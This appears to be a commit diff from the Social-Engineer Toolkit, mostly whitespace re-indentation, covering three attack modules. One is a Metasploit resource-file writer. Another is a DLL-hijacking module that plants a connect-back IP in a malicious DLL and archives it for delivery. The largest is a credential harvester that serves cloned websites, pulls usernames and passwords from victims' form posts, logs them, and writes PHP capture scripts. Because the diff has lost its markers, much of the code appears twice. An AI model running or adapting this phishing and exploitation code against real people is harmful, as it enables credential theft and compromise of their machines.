filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
# auto migration
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
# close webdav file if it was turned on
if webdav_enabled == "on":
webdav_write.close()
webdav_write.close()
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite=file("src/program_junk/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()
filewrite=file("src/program_junk/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()

92
src/webattack/dll_hijacking/hijacking.py
View file

@ -16,11 +16,11 @@ from src.core.setcore import *
definepath=os.getcwd()
try:
import zipfile
import zipfile
except ImportError, error:
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
exit_set()
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
exit_set()
print dll_hijacker_text
@ -31,15 +31,15 @@ fileopen=file("src/webattack/dll_hijacking/repository", "r")
print " Enter the choice of the file extension you want to attack:\n"
counter=1
for line in fileopen:
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
print "\n"
choice=raw_input(setprompt(["2","15"], ""))
if choice == 'exit':
exit_set()
exit_set()
if choice == "": choice="1"
@ -49,12 +49,12 @@ choice=int(choice)
counter=1
fileopen=file("src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line=line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
line=line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
print "\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension,dll)
@ -69,10 +69,10 @@ filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# replace ipaddress with one that we need for reverse connection back
fileopen=open("src/webattack/dll_hijacking/hijacking.dll" , "rb")
@ -90,7 +90,7 @@ filewrite.close()
print """
Do you want to use a zipfile or rar file. Problem with zip
is they will have to extract the files first, you can't just
open the file from inside the zip. Rar does not have this
open the file from inside the zip. Rar does not have this
restriction and is more reliable
1. Rar File
@ -103,37 +103,37 @@ choice=raw_input(setprompt(["2","15"], "[rar]"))
if choice == "": choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its choice 1 do some rar stuff
if choice == "1":
# basic counter
counter=0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd src/program_junk/dll;rar a %s/src/program_junk/template.rar * 1> /dev/null 2> /dev/null" % (definepath), shell=True).wait()
counter=1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
choice = "2"
# basic counter
counter=0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd src/program_junk/dll;rar a %s/src/program_junk/template.rar * 1> /dev/null 2> /dev/null" % (definepath), shell=True).wait()
counter=1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
choice = "2"
# if its a zipfile zip the badboy up
if choice == "2":
# write to a zipfile here
file = zipfile.ZipFile("src/program_junk/template.zip", "w")
for name in glob.glob("src/program_junk/dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()
# write to a zipfile here
file = zipfile.ZipFile("src/program_junk/template.zip", "w")
for name in glob.glob("src/program_junk/dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()

707
src/webattack/harvester/harvester.py
View file

@ -26,14 +26,14 @@ webattack_email = check_config("WEBATTACK_EMAIL=").lower()
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_email == "on":
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = "on"
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = "on"
# detect openssl module
try:
from OpenSSL import SSL
from OpenSSL import SSL
# handle import error that openssl is not there
except ImportError:
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
############################################
# Credential harvester #
@ -52,13 +52,13 @@ from src.core.setcore import *
attack_vector=""
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
line=line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print bcolors.RED + """
print bcolors.RED + """
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC
# see if we're tabnabbing or multiattack
@ -77,16 +77,16 @@ command_center="off"
fileopen=file("config/set_config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file("%s/src/program_junk/cc_harvester_hit" % (definepath),"w")
line=line.rstrip()
match=re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file("%s/src/program_junk/cc_harvester_hit" % (definepath),"w")
# if nada default port 80
if counter == 0: web_port=80
@ -95,19 +95,19 @@ if counter == 0: web_port=80
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
URL = check_config("HARVESTER_URL=")
counter = 1
if counter== 0: URL=''
@ -117,53 +117,53 @@ self_signed="false"
# SEE IF WE WANT TO USE SSL
fileopen=file("config/set_config" , "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp src/program_junk/CA/*.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf src/program_junk/CA;cp *.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp src/program_junk/CA/*.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf src/program_junk/CA;cp *.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
for line in fileopen:
line=line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s src/program_junk/newcert.pem" % (pem_client), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s src/program_junk/newreq.pem" % (pem_server), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
for line in fileopen:
line=line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s src/program_junk/newcert.pem" % (pem_client), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s src/program_junk/newreq.pem" % (pem_server), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
@ -181,283 +181,283 @@ bites = file("src/program_junk/bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL
#class SETHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
class SETHandler(BaseHTTPRequestHandler):
def setup(self):
# added a try except block in case of transmission errors
try:
def setup(self):
# added a try except block in case of transmission errors
try:
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# except errors and pass them
except: pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
# except errors and pass them
except: pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
pass
counter = 0
counter = 0
# try block setup to catch transmission errors
try:
# try block setup to catch transmission errors
try:
if self.path == "/":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# used for index2
if self.path == "/index2.html":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index2.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
else:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
self.send_response(200)
# self.send_header('Content-type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
fileopen=file("%s/src/program_junk/web_clone%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite=file("src/program_junk/site.template","a")
filewrite.write("\n")
filewrite2 = file("src/logs/harvester.log", "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
for line in url:
counter=0
line=line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
if match2:
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
# reset counter
counter=0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
# pull URL field
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
if self.path == "/":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# used for index2
if self.path == "/index2.html":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index2.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(homepath+"/src/program_junk/web_clone/")
else:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
self.send_response(200)
# self.send_header('Content-type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
fileopen=file("%s/src/program_junk/web_clone%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite=file("src/program_junk/site.template","a")
filewrite.write("\n")
filewrite2 = file("src/logs/harvester.log", "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
for line in url:
counter=0
line=line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
if match2:
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
# reset counter
counter=0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
# pull URL field
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(homepath+"/src/program_junk/web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are running apache mode
if apache_check == "off":
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# check if we are running apache mode
if apache_check == "off":
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
# handle the rest
except Exception, e:
log(e)
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == "off":
try:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle the rest
except Exception, e:
log(e)
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == "off":
try:
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except Exception:
apache_counter = 0
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
return_continue()
exit_set()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except Exception:
apache_counter = 0
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
if apache_check == "on":
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
return_continue()
exit_set()
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
if apache_check == "on":
except Exception, e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
except Exception, e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
apache_dir = check_config("APACHE_DIRECTORY=")
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % (now))
filewrite.close()
filewrite = file("%s/harvester_%s.txt" % (apache_dir,now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_dir,now), shell=True).wait()
# here we specify if we are tracking users and such
if track_email.lower() == "on":
fileopen = file ("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/src/program_junk/web_clone/index.2" % (definepath), "w")
filewrite.write(data)
filewrite.close()
os.remove("%s/src/program_junk/web_clone/index.html" % (definepath))
shutil.copyfile("%s/src/program_junk/web_clone/index.2" % (definepath), "%s/src/program_junk/web_clone/index.html" % (definepath))
apache_dir = check_config("APACHE_DIRECTORY=")
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % (now))
filewrite.close()
filewrite = file("%s/harvester_%s.txt" % (apache_dir,now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_dir,now), shell=True).wait()
# here we specify if we are tracking users and such
if track_email.lower() == "on":
fileopen = file ("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/src/program_junk/web_clone/index.2" % (definepath), "w")
filewrite.write(data)
filewrite.close()
os.remove("%s/src/program_junk/web_clone/index.html" % (definepath))
shutil.copyfile("%s/src/program_junk/web_clone/index.2" % (definepath), "%s/src/program_junk/web_clone/index.html" % (definepath))
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email.lower() == "off":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.html" % (apache_dir))
if track_email.lower() == "on":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email.lower() == "off":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.html" % (apache_dir))
if track_email.lower() == "on":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
@ -480,56 +480,55 @@ class SecureHTTPServer(HTTPServer):
def ssl_server(HandlerClass = SETHandler,ServerClass = SecureHTTPServer):
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
if track_email == "on": webattack_email = "on"
# if emailer webattack, spawn email questions
if webattack_email == "on":
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
reload(src.phishing.smtp.client.smtp_web)
if webattack_email == "on":
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
line=line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
if ssl_flag == 'true':
web_port="443"
# check for PEM files here
if not os.path.isfile("src/program_junk/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
if not os.path.isfile("src/program_junk/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
# copy over our PEM files
#if self_signed =="true":
subprocess.Popen("cp src/program_junk/*.pem src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
web_port="443"
# check for PEM files here
if not os.path.isfile("src/program_junk/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
if not os.path.isfile("src/program_junk/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
# copy over our PEM files
#if self_signed =="true":
subprocess.Popen("cp src/program_junk/*.pem src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# head over to cloned dir
os.chdir("src/program_junk/web_clone/")
if attack_vector != "multiattack":
print bcolors.BLUE+"[*] Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
print bcolors.BLUE+"[*] Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
# catch all
